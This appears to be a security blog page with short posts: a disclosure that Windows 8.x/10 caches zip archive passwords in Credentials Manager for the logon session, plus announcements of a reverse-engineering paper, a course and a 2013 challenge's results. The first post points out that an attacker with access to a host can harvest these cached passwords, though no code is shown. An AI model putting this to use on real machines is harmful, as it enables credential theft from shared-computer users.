Credentials Manager – Zip Passwords Caching [Win8.x/10]

tl;dr: When you open a password protected zip archive using Windows Explorer, in Windows 8.x/10 the password is automatically cached in the Credentials Manager for the life of the logon session.

This is doesn’t apply in earlier Windows versions, at least not by default, and it is apparently a ‘feature’ that aims to favor usability. In a few words…”if you have opened once  a protected zip archive using Windows Explorer, then what the hell…, let me cache that password for you so you don’t need to enter it again during that logon session”. Holy crap!!!

If you share the same account on a Windows host with those versions of the OS installed and you open password-protected zip archives with (…ahem) sensitive data using Windows Explorer, then rest assured that if you don’t logoff anyone using your computer can easily get those passwords. So you are basically fucked!
If you are an ethical hacker and you just gained access to a host running Windows 8.x/10, then you might get really lucky since people love re-using the same passwords for different things.
So they are basically fucked!

Example:

The code to do this, is ridiculously simple as well…

Old Dog – New Tricks

It’s been a while since I had some free time to write something about a personal research. Well, free time is not our strong suit anymore, that’s for sure.

Finally, I managed to put some things together and release a paper about a recent research I performed over the new version of Olly v2.01.

Get me there!

Have fun!
kyREcon

eLearnSecurity – ARES

After working closely with eLearnSecurity for more than a year, I am happy to announce that the ARES course is about to be released on the 24th of September 2013.

This course is made for people that want to dive in the world of Software Reverse Engineering, either driven by curiosity or by the will to work professionally on that subject.
The course is highly recommended for anyone willing to work in the IT Security Industry either as a malware analyst or as vulnerability researcher, and exploit writer.
Furthermore, software developers will also benefit by this course which gives an insight of the internal operations that take place during the execution of an application, and also shows how to locate an algorithm and analyze it for various purposes either for Reverse Engineering or for bug hunting.

An interactive webinar will take place on Tuesday 24 of September 2013, where we will be talking about the course, answering to some questions and also perform a short demonstration of what this course is really about.

You may click on the following links to subscribe for the upcoming webinar for free, and download the syllabus of the ARES course.

Links:

Webinar – Finished –

ARES Syllabus

Enjoy,
kyREcon

AthCon 2013 RE Challenge Results

Once again the pre-Athcon contest was completed successfully. It was a decision of the organizers to keep the names of the people that solved the RE challenge private, until the beginning of AthCon 2013.

The following people are those who submitted a valid solution before the deadline in that order. We post their names based on the way they asked to be mentioned.

1. Vladimir U. aka OKOB (Ukraine) – Claimed the Amazon Voucher…and got it :0)

2. @trapflag

3. Dany Zatuchna – Claimed the Athcon 2013 ticket…and got it :0)

4. Στέλιος Τσαμπάς (Stelios Tsampas)

The authors of this challenge would like to thank all the people that dedicated some of their time to this challenge, as well as those that helped to spread the voice by any means. It really means a lot to us.

Enjoy,
kyREcon

All Rights R3v3rs3d